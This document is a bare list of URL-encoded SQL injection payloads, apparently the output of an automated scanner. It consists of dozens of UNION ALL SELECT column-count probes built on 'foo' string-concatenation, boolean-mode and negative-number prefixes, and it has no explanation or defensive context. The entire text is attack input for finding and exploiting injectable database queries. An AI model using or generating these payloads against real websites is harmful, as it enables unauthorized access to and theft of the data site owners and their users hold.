foo%27%7C%7C%28SELECT%20%27ZwXg%27%20FROM%20DUAL%20WHERE%202712%3D2712%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27mucw%27%20FROM%20DUAL%20WHERE%205880%3D5880%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27sIbP%27%20FROM%20DUAL%20WHERE%206365%3D6365%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27mBBU%27%20FROM%20DUAL%20WHERE%203812%3D3812%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27wqjd%27%20FROM%20DUAL%20WHERE%203709%3D3709%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27yXns%27%20FROM%20DUAL%20WHERE%208909%3D8909%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27TGEh%27%20FROM%20DUAL%20WHERE%209882%3D9882%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27ZIeU%27%20FROM%20DUAL%20WHERE%204249%3D4249%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27UOrE%27%20FROM%20DUAL%20WHERE%203303%3D3303%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27Owzq%27%20WHERE%202648%3D2648%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27zdqd%27%20WHERE%204932%3D4932%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27hGfJ%27%20WHERE%204781%3D4781%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27wRoG%27%20WHERE%208367%3D8367%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27aUcG%27%20WHERE%202167%3D2167%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27bZiv%27%20WHERE%207743%3D7743%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27vYEK%27%20WHERE%207487%3D7487%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27htSw%27%20WHERE%205515%3D5515%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27BLXN%27%20WHERE%201631%3D1631%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27NBdM%27%20WHERE%208751%3D8751%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20xSDP%20WHERE%206525%3D6525%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20naOQ%20WHERE%207313%3D7313%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20neVe%20WHERE%207696%3D7696%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20BwUH%20WHERE%201846%3D1846%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20FPyq%20WHERE%205980%3D5980%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20wpET%20WHERE%209745%3D9745%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20mEov%20WHERE%204797%3D4797%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20cEHk%20WHERE%202284%3D2284%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20figb%20WHERE%203317%3D3317%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20MzBO%20WHERE%204721%3D4721%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20%27vvdy%27%20WHERE%203098%3D3098%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20%27UWPv%27%20WHERE%206260%3D6260%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20%27shck%27%20WHERE%209557%3D9557%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20%27QgwG%27%20WHERE%206578%3D6578%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20%27TMXv%27%20WHERE%201985%3D1985%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20%27UaCS%27%20WHERE%201355%3D1355%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20%27bJTx%27%20WHERE%202394%3D2394%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20%27ZGCJ%27%20WHERE%201180%3D1180%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20%27DtFp%27%20WHERE%206596%3D6596%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20%27EQJY%27%20WHERE%208511%3D8511%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 -1822%29%20UNION%20ALL%20SELECT%205504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504--%20 -3301%29%20UNION%20ALL%20SELECT%203183%2C3183%2C3183%2C3183%2C3183%2C3183%2C3183%2C3183%2C3183%2C3183%2C3183%2C3183%2C3183%2C3183%2C3183%2C3183%2C3183%2C3183%2C3183%2C3183%2C3183%2C3183%2C3183%2C3183%2C3183%2C3183%2C3183%2C3183%2C3183%2C3183%2C3183%2C3183--%20 -5082%29%20UNION%20ALL%20SELECT%206937%2C6937%2C6937%2C6937%2C6937%2C6937%2C6937%2C6937%2C6937%2C6937%2C6937%2C6937%2C6937%2C6937%2C6937%2C6937%2C6937%2C6937%2C6937%2C6937%2C6937%2C6937%2C6937%2C6937%2C6937%2C6937%2C6937%2C6937%2C6937%2C6937%2C6937%2C6937%2C6937--%20 -1201%29%20UNION%20ALL%20SELECT%205146%2C5146%2C5146%2C5146%2C5146%2C5146%2C5146%2C5146%2C5146%2C5146%2C5146%2C5146%2C5146%2C5146%2C5146%2C5146%2C5146%2C5146%2C5146%2C5146%2C5146%2C5146%2C5146%2C5146%2C5146%2C5146%2C5146%2C5146%2C5146%2C5146%2C5146%2C5146%2C5146%2C5146--%20 -3543%29%20UNION%20ALL%20SELECT%204560%2C4560%2C4560%2C4560%2C4560%2C4560%2C4560%2C4560%2C4560%2C4560%2C4560%2C4560%2C4560%2C4560%2C4560%2C4560%2C4560%2C4560%2C4560%2C4560%2C4560%2C4560%2C4560%2C4560%2C4560%2C4560%2C4560%2C4560%2C4560%2C4560%2C4560%2C4560%2C4560%2C4560%2C4560--%20 -7005%29%20UNION%20ALL%20SELECT%202283%2C2283%2C2283%2C2283%2C2283%2C2283%2C2283%2C2283%2C2283%2C2283%2C2283%2C2283%2C2283%2C2283%2C2283%2C2283%2C2283%2C2283%2C2283%2C2283%2C2283%2C2283%2C2283%2C2283%2C2283%2C2283%2C2283%2C2283%2C2283%2C2283%2C2283%2C2283%2C2283%2C2283%2C2283%2C2283--%20 -6232%29%20UNION%20ALL%20SELECT%207137%2C7137%2C7137%2C7137%2C7137%2C7137%2C7137%2C7137%2C7137%2C7137%2C7137%2C7137%2C7137%2C7137%2C7137%2C7137%2C7137%2C7137%2C7137%2C7137%2C7137%2C7137%2C7137%2C7137%2C7137%2C7137%2C7137%2C7137%2C7137%2C7137%2C7137%2C7137%2C7137%2C7137%2C7137%2C7137%2C7137--%20 -4798%29%20UNION%20ALL%20SELECT%205485%2C5485%2C5485%2C5485%2C5485%2C5485%2C5485%2C5485%2C5485%2C5485%2C5485%2C5485%2C5485%2C5485%2C5485%2C5485%2C5485%2C5485%2C5485%2C5485%2C5485%2C5485%2C5485%2C5485%2C5485%2C5485%2C5485%2C5485%2C5485%2C5485%2C5485%2C5485%2C5485%2C5485%2C5485%2C5485%2C5485%2C5485--%20 -1297%29%20UNION%20ALL%20SELECT%202783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783--%20 